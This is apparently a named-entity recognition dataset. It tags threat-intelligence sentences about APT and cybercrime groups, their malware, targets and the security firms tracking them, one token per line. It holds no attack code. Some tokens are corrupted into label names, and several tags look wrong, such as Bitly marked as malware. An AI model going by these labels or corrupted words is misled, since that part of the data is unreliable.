O + +Artifacts O +indicated O +the O +involvement O +of O +the O +Cobalt S-APT +that O +, O +according O +to O +Positive O +Technologies B-SECTEAM +information E-SECTEAM +, O +from O +August S-TIME +to O +October S-TIME +had O +performed O +similar O +successful O +attacks O +in O +Eastern B-LOC +Europe E-LOC +, O +and O +it O +'s O +likely O +that O +this O +group O +may O +will O +soon O +become O +active O +in O +the O +West O +. O + +In O +a O +recent O +spear-phishing S-ACT +campaign E-ACT +, O +the O +Cobalt B-APT +Hacking I-APT +Group E-APT +used O +a O +remote B-ACT +code I-ACT +execution E-ACT +vulnerability O +in O +Microsoft S-IDTY +Office O +software O +to O +connect O +to O +its O +command O +and O +control O +server O +via O +Cobalt B-MAL +Strike E-MAL +. O + +The O +basic O +principles O +of O +targeted B-ACT +attacks E-ACT +on O +financial B-IDTY +institutions E-IDTY +have O +not O +changed O +since O +2013 S-TIME +when O +the O +Anunak S-APT +, O +Corkow S-MAL +, O +Buhtrap S-APT +, O +and O +Lurk B-APT +groups E-APT +began O +conducting O +the O +first O +attacks O +on O +Russian S-LOC +banks S-IDTY +. O + +In O +a O +recent O +spear-phishing S-ACT +campaign E-ACT +, O +the O +Cobalt B-APT +Group E-APT +used O +a O +known O +CVE O +to O +connect O +to O +its O +C&C S-TOOL +server O +via O +Cobalt B-MAL +Strike E-MAL +, O +but O +ended O +up O +revealing O +all O +targets O +. O + +This O +isn't O +the O +first O +time O +we've O +seen O +Cobalt S-APT +makes O +this O +error—back O +in O +March S-TIME +, O +an O +attack O +focussing O +on O +1,880 O +targets O +across O +financial B-IDTY +institutions E-IDTY +in O +Kazakhstan S-LOC +had O +the O +same O +flaw O +. O + +The O +Carbanak B-ACT +attacks E-ACT +targeting O +over O +a O +100 O +financial B-IDTY +institutions E-IDTY +worldwide O +. 
O + +The O +leader O +of O +the O +crime B-APT +gang E-APT +behind O +the O +Carbanak S-MAL +and O +Cobalt B-ACT +malware I-ACT +attacks E-ACT +targeting O +over O +a O +100 O +financial B-IDTY +institutions E-IDTY +worldwide O +has O +been O +arrested O +in O +Alicante O +, O +Spain S-LOC +, O +after O +a O +complex O +investigation O +conducted O +by O +the O +Spanish O +National O +Police O +. O + +Since O +2013 S-TIME +, O +the O +Cobalt S-APT +have O +attempted O +to O +attack O +banks S-IDTY +and O +financial B-IDTY +institutions E-IDTY +using O +pieces O +of O +malware O +they O +designed O +. O + +Since O +2013 S-TIME +, O +the O +cybercrime B-APT +gang E-APT +have O +attempted O +to O +attack O +banks S-IDTY +, O +e-payment S-IDTY +systems O +and O +financial B-IDTY +institutions E-IDTY +using O +pieces O +of O +malware O +they O +designed O +, O +known O +as O +Carbanak S-MAL +and O +Cobalt S-MAL +. O + +The O +organised O +crime O +group O +started O +its O +high-tech O +criminal B-ACT +activities E-ACT +in O +late B-TIME +2013 E-TIME +by O +launching O +the O +Anunak B-ACT +malware I-ACT +campaign E-ACT +that O +targeted O +financial O +transfers O +and O +ATM O +networks O +of O +financial B-IDTY +institutions E-IDTY +around O +the O +world O +. O + +One O +of O +the O +Cobalt B-APT +Group E-APT +'s O +latest O +campaigns S-ACT +, O +an O +attack O +that O +leads O +to O +a O +Cobalt S-MAL +Strike B-MAL +beacon E-MAL +and O +to O +JavaScript B-MAL +backdoor E-MAL +, O +was O +investigated O +and O +presented O +by O +the O +Talos S-SECTEAM +research O +team O +. O + +The O +Cobalt S-APT +started O +its O +high-tech O +criminal B-ACT +activities E-ACT +in O +late B-TIME +2013 E-TIME +by O +launching O +the O +Anunak B-ACT +malware I-ACT +campaign E-ACT +that O +targeted O +financial O +transfers O +and O +ATM O +networks O +of O +financial B-IDTY +institutions E-IDTY +around O +the O +world O +. 
O + +The O +Cobalt B-APT +group E-APT +misused O +Cobalt B-MAL +Strike E-MAL +, O +for O +instance O +, O +to O +perpetrate O +ATM O +cyber B-APT +heists E-APT +and O +target O +financial B-IDTY +institutions E-IDTY +across O +Europe S-LOC +, O +and O +interestingly O +, O +Russia S-LOC +. O + +The O +hacking O +group O +misused O +Cobalt B-MAL +Strike E-MAL +, O +for O +instance O +, O +to O +perpetrate O +ATM O +cyber B-APT +heists E-APT +and O +target O +financial B-IDTY +institutions E-IDTY +across O +Europe S-LOC +, O +and O +interestingly O +, O +Russia S-LOC +. O + +If O +successful O +, O +Cobalt S-APT +goes O +on O +to O +attack O +financial B-IDTY +institutions E-IDTY +outside O +the O +country O +. O + +The O +vulnerability O +was O +used O +to O +retrieve O +and O +execute O +Cobalt B-MAL +Strike E-MAL +from O +a O +remote O +server O +they O +controlled O +. O + +As O +part O +of O +our O +monitoring O +of O +Iranian B-ACT +threat I-ACT +agents I-ACT +activities E-ACT +, O +we O +have O +detected O +that O +since O +October B-TIME +2016 E-TIME +and O +until O +the O +end B-TIME +of I-TIME +January I-TIME +2017 E-TIME +, O +the O +Jerusalem B-IDTY +Post E-IDTY +, O +as O +well O +as O +multiple O +other O +Israeli S-LOC +websites O +and O +one O +website O +in O +the O +Palestinian B-IDTY +Authority E-IDTY +were O +compromised O +by O +Iranian S-LOC +threat O +agent O +CopyKittens S-APT +. O + +CopyKittens S-APT +use O +several O +self-developed O +malware O +and O +hacking O +tools O +that O +have O +not O +been O +publicly O +reported O +to O +date O +, O +and O +are O +analyzed O +in O +this O +report O +: O +TDTESS B-MAL +backdoor E-MAL +; O +Vminst S-MAL +, O +a O +lateral O +movement O +tool O +; O +NetSrv S-MAL +, O +a O +Cobalt B-MAL +Strike I-MAL +loader E-MAL +; O +and O +ZPP S-MAL +, O +a O +files O +compression O +console O +program O +. 
O + +CopyKittens S-APT +often O +uses O +the O +trial O +version O +of O +Cobalt B-MAL +Strike E-MAL +, O +a O +publicly O +available O +commercial O +software O +for O +" O +Adversary O +Simulations O +and O +Red O +Team O +Operations O +" O +. O + +Other O +public O +tools O +used O +by O +the O +CopyKittens S-APT +are O +Metasploit S-MAL +, O +a O +well-known O +free O +and O +open O +source O +framework O +for O +developing O +and O +executing O +exploit S-VULNAME +code O +against O +a O +remote O +target O +machine O +; O +Mimikatz S-MAL +, O +a O +post-exploitation O +tool O +that O +performs O +credential O +dumping O +; O +and O +Empire S-MAL +, O +a O +PowerShell S-MAL +and O +Python S-TOOL +post-exploitation O +agent O +. O + +The O +group O +, O +which O +we O +have O +given O +the O +name O +Gallmaker S-APT +, O +has O +been O +operating O +since O +at O +least O +December B-TIME +2017 E-TIME +, O +with O +its O +most O +recent O +activity O +observed O +in O +June B-TIME +2018 E-TIME +. O + +Rather O +, O +the O +Gallmaker S-APT +'s O +attack B-ACT +activity E-ACT +we O +observed O +is O +carried O +out O +exclusively O +using O +LotL S-MAL +tactics O +and O +publicly B-MAL +available I-MAL +hack I-MAL +tools E-MAL +. O + +Gallmaker S-APT +used O +lure B-ACT +documents E-ACT +attempt O +to O +exploit S-VULNAME +the O +Microsoft B-TOOL +Office I-TOOL +Dynamic I-TOOL +Data I-TOOL +Exchange E-TOOL +( O +DDE S-TOOL +) O +protocol O +in O +order O +to O +gain O +access O +to O +victim O +machines O +. O + +Should O +a O +user O +enable O +this O +content O +, O +the O +attackers S-APT +are O +then O +able O +to O +use O +the O +DDE B-MAL +protocol E-MAL +to O +remotely B-ACT +execute I-ACT +commands E-ACT +in O +memory O +on O +the O +victim O +'s O +system O +. 
O + +Back O +in O +2013 S-TIME +, O +CopyKittens S-APT +used O +several O +Facebook S-IDTY +profiles O +to O +spread O +links O +to O +a O +website O +impersonating O +Haaretz O +news O +, O +an O +Israeli S-LOC +newspaper O +. O + +Gallmaker S-APT +'s O +activity O +appears O +to O +be O +highly O +targeted O +, O +with O +its O +victims O +all O +related O +to O +government S-IDTY +, O +military S-IDTY +, O +or O +defense B-IDTY +sectors E-IDTY +. O + +Gallmaker S-APT +'s O +targets O +are O +embassies S-IDTY +of O +an O +Eastern B-LOC +European E-LOC +country O +. O + +There O +are O +no O +obvious O +links O +between O +the O +Eastern B-LOC +European E-LOC +and O +Middle B-LOC +Eastern E-LOC +targets O +, O +but O +it O +is O +clear O +that O +Gallmaker S-APT +is O +specifically O +targeting O +the O +defense S-IDTY +, O +military S-IDTY +, O +and O +government B-IDTY +sectors E-IDTY +. O + +The O +group O +has O +carried O +out O +attacks O +most O +months O +since O +December B-TIME +2017 E-TIME +. O + +Its O +activity O +subsequently O +increased O +in O +the B-TIME +second I-TIME +quarter I-TIME +of I-TIME +2018 E-TIME +, O +with O +a O +particular O +spike O +in O +April B-TIME +2018 E-TIME +. O + +The O +fact O +that O +Gallmaker S-APT +appears O +to O +rely O +exclusively O +on O +LotL S-MAL +tactics O +and O +publicly B-MAL +available I-MAL +hack I-MAL +tools E-MAL +makes O +its O +activities S-ACT +extremely O +hard O +to O +detect O +. O + +The O +Gamaredon B-APT +Group E-APT +primarily O +makes O +use O +of O +compromised O +domains O +, O +dynamic B-IDTY +DNS I-IDTY +providers E-IDTY +, O +Russian S-LOC +and O +Ukrainian S-LOC +country O +code O +top-level O +domains O +( O +ccTLDs O +) O +, O +and O +Russian S-LOC +hosting B-IDTY +providers E-IDTY +to O +distribute O +their O +custom-built S-MAL +malware S-MAL +. 
O + +Gallmaker S-APT +may O +well O +have O +continued O +to O +avoid O +detection O +were O +it O +not O +for O +Symantec S-SECTEAM +'s O +technology O +. O + +In O +this O +instance O +, O +Symantec S-SECTEAM +identified O +the O +specific O +PowerShell B-MAL +commands E-MAL +used O +by O +Gallmaker S-APT +as O +being O +suspicious O +, O +leading O +to O +the O +discovery O +of O +this O +new O +campaign O +. O + +Without O +Symantec S-SECTEAM +'s O +advanced O +AI-based O +capabilities O +, O +Gallmaker S-APT +'s O +activities S-ACT +may O +well O +have O +remained O +undetected O +. O + +Previously O +, O +LookingGlass S-SECTEAM +reported O +on O +a O +campaign O +they O +named O +" O +Operation B-ACT +Armageddon E-ACT +" O +, O +targeting O +individuals O +involved O +in O +the O +Ukrainian S-LOC +military S-IDTY +and O +national O +security O +establishment O +. O + +The O +earliest O +discovered O +sample O +( O +based O +on O +compile O +times O +and O +sandbox O +submission O +times O +) O +distributed O +by O +this O +threat O +group O +resembles O +the O +descriptions O +of O +Gamaredon S-APT +provided O +by O +Symantec S-SECTEAM +and O +Trend B-SECTEAM +Micro E-SECTEAM +. O + +The O +scripts O +would O +also O +use O +wget S-MAL +to O +send O +POST O +requests O +to O +command O +and O +control O +( O +C2 S-TOOL +) O +servers O +that O +would O +contain O +information O +about O +the O +compromised O +system O +. O + +These O +VNC S-MAL +exectuables O +would O +either O +be O +included O +in O +the O +SFX B-ACT +file E-ACT +or O +downloaded O +by O +the O +batch B-ACT +script E-ACT +. O + +The O +batch O +script O +would O +then O +attempt O +to O +have O +the O +VNC S-MAL +program O +connect O +to O +a O +command O +and O +control O +( O +C2 S-TOOL +) O +server O +to O +enable O +the O +server O +to O +control O +the O +compromised O +system O +. 
O + +While O +the O +most O +recent O +samples O +observed O +still O +use O +batch B-MAL +scripts E-MAL +and O +SFX B-MAL +files E-MAL +, O +the O +Gamaredon B-APT +Group E-APT +has O +moved O +aACT O +from O +applications O +like O +wget S-MAL +, O +Remote B-MAL +Manipulator I-MAL +MAL E-MAL +, O +VNC S-MAL +and O +ChkFlsh.exe S-MAL +. O + +The O +threat O +group O +using O +these O +implants O +has O +been O +active O +since O +at O +least O +2014 S-TIME +and O +has O +been O +seen O +targeting O +individuals O +likely O +involved O +in O +the O +Ukrainian S-LOC +government S-IDTY +. O + +Some O +of O +the O +samples O +share O +delivery O +mechanisms O +and O +infrastructure O +with O +samples O +which O +are O +detected O +by O +a O +few O +antivirus O +vendors O +as O +Gamaredon S-APT +. O + +Periodically O +, O +researchers O +at O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +hunt O +through O +WildFire S-SECTEAM +execution O +reports O +, O +using O +AutoFocus O +, O +to O +identify O +untagged O +samples O +' O +artifacts O +in O +the O +hopes O +of O +identifying O +previously O +undiscovered O +malware O +families O +, O +behaviors O +, O +and O +campaigns S-ACT +. O + +Just O +a O +few O +months O +later O +, O +in O +February B-TIME +2015 E-TIME +, O +we O +announced O +the O +discovery O +of O +Carbanak S-MAL +, O +a O +cyber-criminal B-APT +gang E-APT +that O +used O +custom O +malware O +and O +APT B-ACT +techniques E-ACT +to O +steal O +millions O +of O +dollars O +while O +infecting O +hundreds O +of O +financial B-IDTY +institutions E-IDTY +in O +at O +least O +30 O +countries O +. 
O + +Today O +at O +the O +Security B-IDTY +Analyst I-IDTY +Summit E-IDTY +( O +SAS S-IDTY +2016 O +) O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +is O +announcing O +the O +discovery O +of O +two O +new O +gangs O +engaged O +in O +APT-style O +bank S-IDTY +robberies O +– O +Metel S-APT +and O +GCMAN S-APT +– O +and O +the O +reemergence O +of O +the O +Carbanak B-APT +group E-APT +with O +new O +targets O +in O +its O +sights O +. O + +In O +2015 S-TIME +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +researchers O +conducted O +Incident O +Response O +for O +29 O +organizations O +located O +in O +Russia S-LOC +and O +infected O +by O +these O +three O +groups S-APT +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +is O +releasing O +crucial O +Indicators O +of O +Compromise O +( O +IOCs O +) O +and O +other O +data O +to O +help O +organizations O +search O +for O +traces O +of O +these O +attack B-APT +groups E-APT +in O +their O +corporate O +networks O +. O + +In O +all O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +discovered O +Metel S-APT +in O +more O +than O +30 O +financial B-IDTY +institutions E-IDTY +. O + +It O +is O +highly O +likely O +that O +this O +threat O +is O +far O +more O +widespread O +and O +we O +urge O +financial B-IDTY +institutions E-IDTY +around O +the O +world O +to O +scan O +their O +networks O +for O +signs O +of O +the O +Metel S-MAL +malware S-MAL +. O + +A O +second O +group O +, O +which O +we O +call O +GCMAN S-APT +because O +the O +malware O +is O +based O +on O +code O +compiled O +on O +the O +GCC O +compiler O +, O +emerged O +recently O +using O +similar O +techniques O +to O +the O +Metel B-APT +Group E-APT +to O +infect O +banking B-IDTY +institutions E-IDTY +and O +attempt O +to O +transfer O +money O +to O +e-currency O +services O +. 
O + +Our O +investigations O +revealed O +that O +the O +attackers S-APT +drove O +around O +several O +cities O +in O +Russia S-LOC +, O +stealing O +money O +from O +ATMs O +belonging O +to O +different O +banks S-IDTY +. O + +Once O +inside O +the O +network O +, O +the O +GCMAN B-APT +group E-APT +uses O +legitimate O +and O +penetration O +testing O +tools O +such O +as O +Putty S-MAL +, O +VNC S-MAL +, O +and O +Meterpreter S-MAL +for O +lateral O +movement O +. O + +Our O +investigation O +revealed O +an O +attack O +where O +the O +GCMAN B-APT +group E-APT +then O +planted O +a O +cron B-ACT +script E-ACT +into O +bank S-IDTY +'s O +server O +, O +sending O +financial O +transactions O +at O +the O +rate O +of O +$200 O +per O +minute O +. O + +The O +GCMAN B-APT +group E-APT +used O +an O +MS B-ACT +SQL I-ACT +injection E-ACT +in O +commercial O +software O +running O +on O +one O +of O +bank S-IDTY +'s O +public O +web O +services O +, O +and O +about O +a O +year O +and O +a O +half O +later O +, O +they O +came O +back O +to O +cash O +out O +. O + +During O +that O +time O +they O +poked O +70 O +internal O +hosts O +, O +compromised O +56 O +accounts O +, O +making O +their O +ACT O +from O +139 O +attack O +sources O +( O +TOR O +and O +compromised O +home O +routers O +) O +. O + +However O +, O +in O +September S-TIME +last O +year O +, O +our O +friends O +at O +CSIS S-SECTEAM +published O +a O +blog O +detailing O +a O +new O +Carbanak S-MAL +variant O +affecting O +one O +of O +its O +customers S-IDTY +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +research O +team O +responded O +to O +three O +financial B-IDTY +institutions E-IDTY +in O +Russia S-LOC +that O +were O +infected O +with O +the O +GCMAN S-MAL +malware S-MAL +. 
O + +In O +one O +remarkable O +case O +, O +the O +Carbanak S-MAL +2.0 O +gang O +used O +its O +access O +to O +a O +financial B-IDTY +institution E-IDTY +that O +stores O +information O +about O +shareholders O +to O +change O +the O +ownership O +details O +of O +a O +large O +company O +. O + +Recently O +Subaat S-APT +drew O +our O +attention O +due O +to O +renewed O +targeted B-ACT +attack I-ACT +activity E-ACT +. O + +Technical O +analysis O +on O +some O +of O +the O +attacks O +as O +well O +as O +attribution O +links O +with O +Pakistan S-LOC +actors S-APT +have O +been O +already O +depicted O +by O +360 S-SECTEAM +and O +Tuisec S-SECTEAM +, O +in O +which O +they O +found O +interesting O +connections O +to O +a O +larger O +group O +of O +attackers S-APT +Unit B-SECTEAM +42 E-SECTEAM +researchers O +have O +been O +tracking O +, O +which O +we O +are O +calling O +Gorgon B-APT +Group E-APT +. O + +Starting O +in O +February B-TIME +2018 E-TIME +, O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +identified O +a O +campaign O +of O +attacks O +performed O +by O +members O +of O +Gorgon B-APT +Group E-APT +targeting O +governmental B-IDTY +organizations E-IDTY +in O +the O +United B-LOC +Kingdom E-LOC +, O +Spain S-LOC +, O +Russia S-LOC +, O +and O +the O +United B-LOC +States E-LOC +. O + +Starting O +in O +February B-TIME +2018 E-TIME +, O +Palo B-SECTEAM +Alto I-SECTEAM +Networks I-SECTEAM +Unit I-SECTEAM +42 E-SECTEAM +identified O +a O + +of O +attacks O +performed O +by O +members O +of O +Gorgon B-APT +Group E-APT +targeting O +governmental B-IDTY +organizations E-IDTY +in O +the O +United B-LOC +Kingdom E-LOC +, O +Spain S-LOC +, O +Russia S-LOC +, O +and O +the O +United B-LOC +States E-LOC +. 
O + +The O +GCMAN B-APT +group E-APT +has O +moved O +beyond O +banks S-IDTY +and O +is O +now O +targeting O +the O +budgeting S-IDTY +and O +accounting B-IDTY +departments E-IDTY +in O +any O +organization O +of O +interest O +to O +them O +, O +using O +the O +same O +APT-style O +tools O +and O +techniques O +. O + +Starting O +in O +February B-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +identified O +a O +campaign O +of O +attacks O +performed O +by O +members O +of O +Gorgon B-APT +Group E-APT +targeting O +governmental B-IDTY +organizations E-IDTY +in O +the O +United B-LOC +Kingdom E-LOC +, O +Spain S-LOC +, O +Russia S-LOC +, O +and O +the O +United B-LOC +States E-LOC +. O + +APT38 S-APT +'s O +increasingly O +aggressive O +targeting O +against O +banks S-IDTY +. O + +Gorgon B-APT +Group E-APT +used O +common O +URL B-ACT +shortening I-ACT +services E-ACT +to O +download O +payloads O +. O + +The O +GCMAN B-APT +group E-APT +has O +moved O +beyond O +banks S-IDTY +and O +is O +now O +targeting O +the O +budgeting S-IDTY +and O +accounting B-IDTY +departments E-IDTY +in O +any O +organization O +of O +interest O +to O +them O +, O +using O +the O +same O +APT-style O +tools O +and O +techniques O +. O + +APT38 S-APT +has O +paralleled O +North B-LOC +Korea E-LOC +'s O +worsening O +financial O +condition O +. O + +On O +much O +of O +the O +C2 S-TOOL +infrastructure O +we O +identified O +several O +crimeware O +family O +samples O +. O + +While O +investigating O +the O +domains O +and O +infrastructure O +used O +by O +the O +phishing B-ACT +components E-ACT +of O +Gorgon B-APT +Group E-APT +, O +Unit B-SECTEAM +42 E-SECTEAM +researchers O +witnessed O +several O +common O +operational O +security O +flaws O +with O +Gorgon B-APT +Group I-APT +'s I-APT +actors E-APT +throughout O +their O +many O +campaigns S-ACT +. O + +360 S-SECTEAM +and O +Tuisec S-SECTEAM +already O +identified O +some O +Gorgon B-APT +Group E-APT +members S-IDTY +. 
O + +RATs S-MAL +such O +as O +NjRat S-MAL +and O +infostealers O +like O +Lokibot S-MAL +were O +leveraging O +the O +same O +C2 S-TOOL +infrastructure O +as O +that O +of O +the O +targeted B-ACT +attacks E-ACT +. O + +it O +'s O +not O +known O +if O +the O +attackers S-APT +physically O +reside O +in O +Pakistan S-LOC +. O + +Gorgon S-APT +used O +numerous O +decoy B-ACT +documents E-ACT +and O +phishing B-ACT +emails S-TOOL +, O +both O +styles O +of O +attacks O +lacked O +overall O +sophistication O +. O + +While O +it O +'s O +not O +known O +if O +the O +attackers S-APT +physically O +reside O +in O +Pakistan S-LOC +, O +all O +members O +of O +Gorgon B-APT +Group E-APT +purport O +to O +be O +in O +Pakistan S-LOC +based O +on O +their O +online O +personas O +. O + +Starting O +in O +mid-February S-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +researchers O +have O +been O +tracking O +an O +active B-ACT +campaign E-ACT +sharing O +a O +significant O +portion O +of O +infrastructure O +leveraged O +by O +Gorgon B-APT +Group E-APT +for O +criminal B-ACT +and I-ACT +targeted I-ACT +attacks E-ACT +. O + +Unit B-SECTEAM +42 E-SECTEAM +researchers O +have O +been O +tracking O +Gorgon B-APT +Group E-APT +for O +criminal B-ACT +and I-ACT +targeted I-ACT +attacks E-ACT +. O + +As O +part O +of O +the O +investigation O +, O +Unit B-SECTEAM +42 E-SECTEAM +researchers O +were O +able O +to O +identify O +an O +interesting O +characteristic O +about O +how O +the O +Gorgon B-APT +Group E-APT +crew O +uses O +shared B-MAL +infrastructure E-MAL +between O +cybercrime B-ACT +and I-ACT +targeted I-ACT +attacks E-ACT +. O + +The O +crew O +combines O +both O +regular O +crime O +and O +targeted B-ACT +attack E-ACT +objectives O +using O +the O +same O +domain B-MAL +infrastructure E-MAL +over O +time O +, O +rarely O +changing O +their O +TTPs O +. 
O + +One O +interesting O +note O +about O +the O +criminal B-ACT +activity E-ACT +of O +Gorgon B-APT +Group E-APT +is O +their O +usage O +of O +Bitly S-MAL +. O + +Between O +April B-TIME +1 I-TIME +, I-TIME +2018 E-TIME +and O +May B-TIME +30 I-TIME +, I-TIME +2018 E-TIME +, O +we O +observed O +the O +domain O +stevemike-fireforce.info O +used O +in O +a O +Gorgon B-ACT +Group I-ACT +cybercrime I-ACT +campaign E-ACT +involving O +more O +than O +2,300 O +emails S-TOOL +and O +19 O +documents O +in O +the O +initial O +attack O +. O + +Similar O +to O +that O +of O +their O +targeted B-ACT +attacks E-ACT +, O +Gorgon B-APT +Group E-APT +leveraged O +Bitly S-MAL +for O +distribution O +and O +shortening O +of O +C2 S-TOOL +domains O +. O + +Beginning O +in O +early B-TIME +March I-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +started O +observing O +targeted B-ACT +attacks E-ACT +against O +Russian S-LOC +, O +Spanish S-LOC +and O +United B-LOC +States E-LOC +government B-IDTY +agencies E-IDTY +operating O +in O +Pakistan S-LOC +. O + +Leveraging O +click O +counts O +for O +the O +campaign O +for O +Bitly S-MAL +, O +we O +were O +able O +to O +see O +Gorgon B-APT +Group E-APT +'s O +activity O +volume O +increase O +throughout O +April S-TIME +. O + +As O +we O +continued O +to O +investigate O +, O +it O +became O +apparent O +that O +Gorgon B-APT +Group E-APT +had O +been O +consistently O +targeting O +worldwide O +governmental B-IDTY +organizations E-IDTY +operating O +within O +Pakistan S-LOC +. O + +Starting O +in O +mid-February S-TIME +. O + +Additionally O +, O +during O +that O +time O +, O +members O +of O +Gorgon B-APT +Group E-APT +were O +also O +performing O +criminal B-ACT +operations E-ACT +against O +targets O +across O +the O +globe O +, O +often O +using O +shared B-MAL +infrastructure E-MAL +with O +their O +targeted B-ACT +attack I-ACT +operations E-ACT +. 
O + +Unit B-SECTEAM +42 E-SECTEAM +researchers O +have O +been O +tracking O +an O +active B-ACT +campaign E-ACT +. O + +This O +Gorgon B-ACT +Group I-ACT +campaign E-ACT +leveraged O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +Microsoft B-FILE +Word I-FILE +documents E-FILE +exploiting O +CVE-2017-0199 S-VULID +. O + +Beginning O +in O +early B-TIME +March I-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +started O +observing O +Gorgon B-ACT +group I-ACT +attacks E-ACT +against O +Russian S-LOC +, O +Spanish S-LOC +and O +United B-LOC +States E-LOC +government B-IDTY +agencies E-IDTY +operating O +in O +Pakistan S-LOC +. O + +Like O +all O +of O +Gorgon B-APT +Group E-APT +'s O +members O +, O +Fudpage O +'s O +online O +profile O +, O +infrastructure B-MAL +utilization E-MAL +and O +standardization S-MAL +, O +connects O +them O +back O +to O +Gorgon B-APT +Group E-APT +. O + +Ultimately O +, O +this O +lead O +us O +to O +the O +conclusion O +that O +several O +of O +Gorgon B-APT +Group E-APT +'s O +members O +have O +a O +nexus O +in O +Pakistan S-LOC +. O + +Gorgon B-APT +Group E-APT +isn't O +the O +first O +actor O +group O +we've O +witnessed O +dabble O +in O +both O +nation O +state O +level O +and O +criminal B-ACT +attacks E-ACT +. O + +Overall O +, O +in O +spite O +of O +the O +lack O +of O +sophistication O +in O +Gorgon B-APT +Group E-APT +'s O +activity O +, O +they O +were O +still O +relatively O +successful O +; O +once O +again O +proving O +that O +simple O +attacks O +on O +individuals O +without O +proper O +protections O +, O +work O +. O + +On O +January B-TIME +15 E-TIME +, O +Advanced B-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +discovered O +an O +operation O +using O +a O +new O +variant O +of O +the O +SYSCON B-MAL +backdoor E-MAL +. 
O + +The O +Korean-language O +Word B-MAL +document E-MAL +manual.doc S-FILE +appeared O +in O +Vietnam S-LOC +on O +January B-TIME +17 E-TIME +, O +with O +the O +original O +author O +name O +of O +Honeybee S-APT +. O + +While O +Gorgon B-APT +Group E-APT +has O +been O +making O +minor O +changes O +in O +their O +methodologies O +, O +they O +are O +still O +actively O +involved O +in O +both O +targeted O +and O +criminal B-ACT +attacks E-ACT +. O + +This O +malicious O +document O +contains O +a O +Visual B-ACT +Basic I-ACT +macro E-ACT +that O +dropped O +and O +executed O +an O +upgraded O +version O +of O +the O +implant O +known O +as O +SYSCON S-MAL +, O +which O +appeared O +in O +2017 S-TIME +in O +malicious B-FILE +Word I-FILE +documents E-FILE +as O +part O +of O +several O +campaigns S-ACT +using O +North S-LOC +Korea–related O +topics O +. O + +This O +key O +was O +also O +used O +in O +the O +Honeybee B-ACT +campaign E-ACT +and O +appears O +to O +have O +been O +used O +since O +August B-TIME +2017 E-TIME +. O + +Several O +additional O +documents O +surfaced O +between O +January B-TIME +17 E-TIME +and O +February B-TIME +3 E-TIME +. O + +All O +contain O +the O +same O +Visual B-ACT +Basic I-ACT +macro I-ACT +code E-ACT +and O +author O +name O +as O +Honeybee S-APT +. O + +Some O +of O +the O +malicious O +documents O +were O +test B-MAL +files E-MAL +without O +the O +implant O +. O + +From O +our O +analysis O +, O +Honeybee S-APT +submitted O +most O +of O +these O +documents O +from O +South B-LOC +Korea E-LOC +, O +indicating O +that O +some O +of O +the O +targeting O +was O +in O +South B-LOC +Korea E-LOC +. O + +Honeybee S-APT +attacked O +beyond O +the O +borders O +of O +South B-LOC +Korea E-LOC +to O +target O +Vietnam S-LOC +, O +Singapore S-LOC +, O +Argentina S-LOC +, O +Japan S-LOC +, O +Indonesia S-LOC +, O +and O +Canada S-LOC +. 
O + +Honeybee S-APT +appears O +to O +target O +humanitarian O +aid O +and O +inter-Korean S-LOC +affairs O +. O + +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +'s O +analysis O +, O +we O +find O +multiple O +components O +from O +this O +operation O +are O +unique O +from O +a O +code O +perspective O +, O +even O +though O +the O +code O +is O +loosely O +based O +on O +previous O +versions O +of O +the O +SYSCON B-MAL +backdoor E-MAL +. O + +Large-scale O +cyber B-ACT +espionage I-ACT +campaigns E-ACT +such O +as O +" O +GhostNet S-ACT +" O +. O + +As O +the O +crisis O +in O +Syria S-LOC +escalates O +, O +FireEye S-SECTEAM +researchers O +have O +discovered O +a O +cyber B-ACT +espionage I-ACT +campaign E-ACT +, O +which O +we O +call O +" O +Ke3chang S-APT +" O +, O +that O +falsely O +advertises O +information O +updates O +about O +the O +ongoing O +crisis O +to O +compromise O +MFA O +networks O +in O +Europe S-LOC +. O + +As O +the O +crisis O +in O +Syria S-LOC +escalates O +, O +FireEye S-SECTEAM +researchers O +have O +discovered O +a O +threat O +group O +, O +which O +we O +call O +" O +Ke3chang S-APT +" O +, O +that O +falsely O +advertises O +information O +updates O +about O +the O +ongoing O +crisis O +to O +compromise O +MFA O +networks O +in O +Europe S-LOC +. O + +We O +believe O +that O +the O +Ke3chang S-APT +attackers S-APT +are O +operating O +out O +of O +China S-LOC +and O +have O +been O +active O +since O +at O +least O +2010 S-TIME +. O + +FireEye S-SECTEAM +gained O +visibility O +into O +one O +of O +23 O +known O +command-and-control S-TOOL +( O +CnC S-TOOL +) O +servers O +operated O +by O +the O +Ke3chang B-APT +actor E-APT +for O +about O +one O +week O +. O + +Each O +attack O +comprises O +a O +variety O +of O +phases O +, O +including O +reconnaissance O +, O +exploitation O +, O +command O +and O +control O +, O +lateral O +movement O +, O +and O +Exfiltration S-ACT +. 
O + +The O +Ke3chang S-APT +attackers S-APT +have O +been O +active O +since O +at O +least O +2010 S-TIME +. O + +traditionally O +targeted O +the O +aerospace S-IDTY +, O +energy S-IDTY +, O +government S-IDTY +, O +high-tech S-IDTY +, O +consulting B-IDTY +services E-IDTY +, O +and O +chemicals S-IDTY +/ O +manufacturing S-IDTY +/ O +mining B-IDTY +sectors E-IDTY +. O + +The O +Ke3chang S-APT +have O +used O +three O +types O +of O +malware O +over O +the O +years O +and O +have O +traditionally O +targeted O +the O +aerospace S-IDTY +, O +energy S-IDTY +, O +government S-IDTY +, O +high-tech S-IDTY +, O +consulting B-IDTY +services E-IDTY +, O +chemicals S-IDTY +, O +manufacturing S-IDTY +, O +mining B-IDTY +sectors E-IDTY +. O + +August B-TIME +2013 E-TIME +, O +FireEye S-SECTEAM +gained O +visibility O +on O +one O +of O +22 O +CnC O +servers O +used O +at O +that O +time O +by O +the O +Ke3chang S-APT +attackers S-APT +. O + +In O +this O +report O +, O +we O +present O +the O +historical O +intelligence O +we O +have O +gathered O +on O 